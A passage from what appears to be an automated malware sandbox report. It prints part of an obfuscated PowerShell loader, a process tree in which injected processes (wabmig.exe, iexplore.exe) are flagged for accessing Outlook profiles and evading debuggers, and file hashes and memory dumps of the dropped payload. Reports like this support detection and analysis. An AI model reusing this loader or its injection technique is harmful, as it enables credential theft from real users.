,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3828
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:992
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
                PID:3720
              • C:\Program Files (x86)\windows mail\wabmig.exe
                "C:\Program Files (x86)\windows mail\wabmig.exe"
                5⤵
                  PID:2352
                • C:\Program Files (x86)\windows mail\wabmig.exe
                  "C:\Program Files (x86)\windows mail\wabmig.exe"
                  5⤵
                    PID:64
                  • C:\Program Files (x86)\windows mail\wabmig.exe
                    "C:\Program Files (x86)\windows mail\wabmig.exe"
                    5⤵
                      PID:2052
                    • C:\Program Files (x86)\windows mail\wabmig.exe
                      "C:\Program Files (x86)\windows mail\wabmig.exe"
                      5⤵
                        PID:412
                      • C:\Program Files (x86)\windows mail\wabmig.exe
                        "C:\Program Files (x86)\windows mail\wabmig.exe"
                        5⤵
                          PID:4232
                        • C:\Program Files (x86)\windows mail\wabmig.exe
                          "C:\Program Files (x86)\windows mail\wabmig.exe"
                          5⤵
                            PID:2912
                          • C:\Program Files (x86)\windows mail\wabmig.exe
                            "C:\Program Files (x86)\windows mail\wabmig.exe"
                            5⤵
                              PID:2412
                            • C:\Program Files (x86)\windows mail\wabmig.exe
                              "C:\Program Files (x86)\windows mail\wabmig.exe"
                              5⤵
                                PID:4440
                              • C:\Program Files (x86)\windows mail\wabmig.exe
                                "C:\Program Files (x86)\windows mail\wabmig.exe"
                                5⤵
                                  PID:4412
                                • C:\Program Files (x86)\windows mail\wabmig.exe
                                  "C:\Program Files (x86)\windows mail\wabmig.exe"
                                  5⤵
                                    PID:1256
                                  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                    5⤵
                                    • Accesses Microsoft Outlook profiles
                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    • outlook_office_path
                                    • outlook_win_path
                                    PID:4404

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r2hlleee.scd.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Hygrophthalmic.dis
                            Filesize

                            474KB

                            MD5

                            a79506f805546d94c4280f98dcdd84a8

                            SHA1

                            b641bc5daef6955be1a63bfe38c6a941e3cab344

                            SHA256

                            a297eab229c20b75972e29a8ed769faeede656a3ab7e6646c19fd7a33eb7e633

                            SHA512

                            2082aa32a661c677014bfdd04b2ed24b9a04cc45295ce61a12b35dff6deccbeade24f6f78e5682768fb48a98337c8fd61c6b6bff6066f770ced3d399d602b8ec

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302416131-1437503476-2806442725-1000\0f5007522459c86e95ffcc62f32308f1_acd03e19-89e2-40d7-b0f4-25b8a05635ee
                            Filesize

                            46B

                            MD5

                            c07225d4e7d01d31042965f048728a0a

                            SHA1

                            69d70b340fd9f44c89adb9a2278df84faa9906b7

                            SHA256

                            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                            SHA512

                            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302416131-1437503476-2806442725-1000\0f5007522459c86e95ffcc62f32308f1_acd03e19-89e2-40d7-b0f4-25b8a05635ee
                            Filesize

                            46B

                            MD5

                            d898504a722bff1524134c6ab6a5eaa5

                            SHA1

                            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                            SHA256

                            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                            SHA512

                            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                            Download Submit

                          • memory/2308-15-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-19-0x00007FFECADC3000-0x00007FFECADC5000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/2308-20-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-21-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-16-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-4-0x00007FFECADC3000-0x00007FFECADC5000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/2308-63-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-47-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2308-10-0x000001ECF9940000-0x000001ECF9962000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/2308-39-0x00007FFECADC0000-0x00007FFECB881000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/3828-37-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/3828-38-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

                            Filesize

                            304KB

                            Download

                          • memory/3828-36-0x0000000005580000-0x00000000058D4000-memory.dmp

                            Filesize

                            3.3MB

                            Download

                          • memory/3828-40-0x00000000073F0000-0x0000000007A6A000-memory.dmp

                            Filesize

                            6.5MB

                            Download

                          • memory/3828-41-0x0000000006150000-0x000000000616A000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/3828-42-0x0000000006E40000-0x0000000006ED6000-memory.dmp

                            Filesize

                            600KB

                            Download

                          • memory/3828-43-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/3828-44-0x0000000008020000-0x00000000085C4000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/3828-26-0x0000000004E50000-0x0000000004EB6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/3828-46-0x00000000085D0000-0x000000000A8DE000-memory.dmp

                            Filesize

                            35.1MB

                            Download

                          • memory/3828-25-0x0000000004D70000-0x0000000004DD6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/3828-24-0x0000000004CD0000-0x0000000004CF2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/3828-23-0x0000000004F50000-0x0000000005578000-memory.dmp

                            Filesize

                            6.2MB

                            Download

                          • memory/3828-22-0x0000000000F20000-0x0000000000F56000-memory.dmp

                            Filesize

                            216KB

                            Download